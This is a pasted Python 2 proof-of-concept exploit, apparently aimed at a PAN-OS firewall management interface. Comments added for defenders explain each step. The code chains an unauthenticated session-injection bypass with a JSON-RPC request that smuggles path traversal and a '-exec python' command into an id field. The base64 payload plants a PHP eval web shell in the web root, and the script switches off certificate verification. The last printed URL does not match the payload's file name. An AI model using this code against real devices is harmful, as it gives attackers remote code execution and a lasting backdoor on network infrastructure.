
panos-rce-poc-v1.py

a guest Mar 13th, 2018 406 Never
# Python 2 script (urllib2, print statements). It sends three HTTPS requests
# to the web management interface at `domain`. The paste title
# (panos-rce-poc-v1.py) and the "pancfg"/"PanDirect" strings below suggest the
# target is a PAN-OS management interface -- inferred from names only, and the
# page gives no advisory identifier.
#
# Defender summary of what the requests look like on the wire:
#   1. GET  /esp/cms_changeDeviceContext.esp  with quote characters in `device`
#   2. GET  /php/utils/debug.php              with the PHPSESSID from step 1
#   3. POST /php/utils/router.php/Administrator.get  with a JSON-RPC body whose
#      `id` field carries quotes, XML-style attributes and a "../" sequence
# Any of these from a client that never completed a login is worth alerting
# on. Restricting the management interface to a trusted network removes the
# exposure this script depends on.
import urllib
import urllib2
import ssl
import sys

# Replaces the process-wide default HTTPS context with one that performs no
# certificate or hostname verification (uses private ssl module names).
ssl._create_default_https_context = ssl._create_unverified_context

# Target host; the value here is a private-range address.
domain = "192.168.1.1"

#pass auth
# Step 1: unauthenticated request whose `device` parameter contains a single
# and a double quote followed by `user|s:`. That fragment resembles PHP
# session serialization syntax -- presumably it is meant to end up in the
# server-side session data; the page does not show the server code.
print "step 1: pass_auth"
pass_auth_url = "https://" + domain + "/esp/cms_changeDeviceContext.esp?device=1024:bbbb'\";user|s:"
print "pass_auth request:    " + pass_auth_url
request = urllib2.Request(pass_auth_url)
response = urllib2.urlopen(request)
print "pass_auth respone:    " + response.read()
# Pull the PHPSESSID name=value pair out of the Set-Cookie header; the script
# stops if the header does not contain one.
session_start_index = response.headers['Set-Cookie'].find("PHPSESSID")
if session_start_index == -1:
    print "pass_auth fail!!"
    sys.exit()
session = response.headers['Set-Cookie'][session_start_index:]
session = session[:session.find(';')]
# The same session cookie is sent with every later request.
auth_headers = {
 'Cookie':session,
 'Connection':'keep-alive'
}


# Step 2: fetch debug.php with the cookie from step 1. The script treats the
# word "Debug" in the body as proof that the session is accepted as logged in.
print "\n"
print "step 2: check if pass auth"
auth_url = "https://" + domain + "/php/utils/debug.php"
print "auth_url request:    " + auth_url
request = urllib2.Request(auth_url, headers = auth_headers)
response = urllib2.urlopen(request)
content = response.read()
#print content
if "Debug" not in content:
    print "pass auth fail!!"
    sys.exit()
print "pass auth success!!"


# Step 3: JSON-RPC POST to router.php. The `id` value closes a quoted string
# and a bracket, then adds XML-style attributes; the `cookie` attribute holds
# a "../" path under /opt/pancfg/mgmt/logdb/traffic/1/ followed by
# `-print -exec python -c ...` and a trailing NUL (\u0000). Given the step
# label ("create dir") and the 15-minute wait printed at the end, presumably
# the value becomes a file or directory name that a scheduled job later
# passes to a find-style command -- inferred, not shown on this page.
#
# The base64 string decodes to a one-line Python snippet that writes a PHP
# file under /var/appweb/htdocs/; that file evaluates a POST parameter, i.e.
# it is a web shell. For hunting, take the file name from the decoded payload
# rather than from the message printed on the last line, and look for
# unexpected .php files in the web root and for odd entries under the logdb
# path above.
print "\n"
print "setp 3: create dir"
create_dir_url = "https://" + domain + "/php/utils/router.php/Administrator.get"
print "create_dir request:    " + create_dir_url
post_data = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec(\\\"Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvcG9jLnBocCcsICd3Jyk7Zi53cml0ZSgiPD9waHAgQGV2YWwoJF9QT1NUWydqYmZjd2FzaGVyZSddKTs/PiIpO2YuY2xvc2UoKTs=\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
request = urllib2.Request(create_dir_url, headers = auth_headers, data=post_data)
# The response to this request is never read or checked.
response = urllib2.urlopen(request)

# The script only prints where to look later; it does not verify that the
# file was created.
print "\n"
print "15 minutes later, visit https://" + domain + "/vudrc.php"